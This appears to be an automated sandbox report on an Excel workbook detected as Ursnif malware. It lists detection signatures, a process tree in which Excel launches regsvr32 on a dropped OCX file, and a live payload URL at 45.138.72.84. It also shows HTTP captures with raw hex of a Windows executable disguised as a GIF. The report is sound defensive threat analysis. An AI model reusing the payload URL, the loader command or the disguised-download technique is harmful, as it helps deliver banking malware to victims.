Loading ...

Play interactive tourEdit tour

Analysis Report InformazioneGenerale.xlsb

Overview

General Information

Sample Name:InformazioneGenerale.xlsb
Analysis ID:316010
MD5:4dddb0320eac6050d6360c92c104d05c
SHA1:816db7af62de3dc200b88357a5341c6ce184cc93
SHA256:ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2100 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6220 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6424 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3652 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5372 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3652 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1180 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6828 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1180 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3892 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1092 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6240 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.229213427.00000000064F0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.230412465.00000000064F0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.230133784.00000000064F0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.230002994.00000000064F0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 30 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2100, ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, ProcessId: 6220

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://45.138.72.84/10.11nov322.gifAvira URL Cloud: Label: malware
            Source: http://45.138.72.84/10.11nov322.gifAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://45.138.72.84/10.11nov322.gifVirustotal: Detection: 8%Perma Link
            Source: http://45.138.72.84/10.11nov322.gifVirustotal: Detection: 8%Perma Link
            Source: 1.2.regsvr32.exe.e40000.1.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 1.2.regsvr32.exe.e40000.1.unpackAvira: Label: TR/Patched.Ren.Gen

            Software Vulnerabilities:

            barindex
            Document exploit detected (drops PE files)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 10.11nov322[1].gif.0.drJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 10.11nov322[1].gif.0.drJump to dropped file
            Document exploit detected (UrlDownloadToFile)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Downloads files with wrong headers with respect to MIME Content-TypeShow sources
            Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:40 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:40 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:40 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:40 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: unknownTCP traffic detected without corresponding DNS query: 45.138.72.84
